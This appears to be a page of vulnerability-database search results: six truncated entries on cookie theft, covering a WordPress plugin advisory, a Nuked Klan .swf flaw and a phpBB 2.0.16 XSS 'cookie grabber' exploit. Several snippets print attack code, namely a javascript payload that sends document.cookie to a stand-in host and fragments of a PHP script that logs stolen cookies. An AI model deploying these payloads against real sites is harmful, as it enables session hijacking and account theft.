6 matches found
CVE-2025-11693
The Export WP Page to Static HTML & PDF plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.3.4 through publicly exposed cookies.txt files containing authentication cookies. This makes it possible for unauthenticated attackers to cookies th...
WordPress plugin Export WP Page to Static HTML & PDF 信息泄露漏洞
WordPress and the WordPress plugin are both products of the WordPress Foundation.WordPress is a blogging platform developed in the PHP language. The platform has the ability to host personal blog sites on PHP and MySQL based servers.WordPress plugin is an application plugin. WordPress plugin Expo...
Nuked Klan任意.SWF文件COOKIE窃取漏洞
Nuked Klan是一款基于ASP的WEB应用程序。 Nuked Klan处理.swf文件存在问题,远程攻击者可以利用漏洞获取其他目标用户的敏感COOKIE信息。 构建一个.swf文件,放置如下代码: getURL"javascript:alert'document.location="http://site.com/cookie.php? cookie="+document.cookie';"; 或者 ?php $cookie = $GET'cookie'; $ip = getenv 'REMOTEADDR'; $date=date"m/d/Y g:i:s a";...
phpBB <= 2.0.16 XSS Remote Cookie Disclosure Exploit (cookie grabber)
Exploit for unknown platform in category web applications ===================================================================== phpBB IP: ' .$ip. ' Date and Time: ' .$date. ' Referer: '.$referer.''; fclose$fp; ? //rename it to cookies.php and create one new file steal.php and chmod it to 777...
phpBB <= 2.0.16 XSS Remote Cookie Disclosure Exploit (cookie grabber)
No description provided by source. // Original Author: 'Sjaak Rake' Ref: http://www.hackthissite.org/articles/read/175/ ?php $cookie = $GET'c'; $ip = getenv 'REMOTEADDR'; $date=date"j F, Y, g:i a"; $referer=getenv 'HTTPREFERER'; $fp = fopen'cookies.txt', 'a'; fwrite$fp, 'Cookie: '.$cookie.'br IP:...
phpBB 2.0.16 - Cross-Site Scripting Remote Cookie Disclosure (Cookie Grabber)
phpBB 2.0.16 - Cross-Site Scripting Remote Cookie Disclosure Cookie Grabber // Original Author: 'Sjaak Rake' Ref: http://www.hackthissite.org/articles/read/175/ IP: ' .$ip. ' Date and Time: ' .$date. ' Referer: '.$referer.''; fclose$fp; ? //rename it to cookies.php and create one new file steal.p...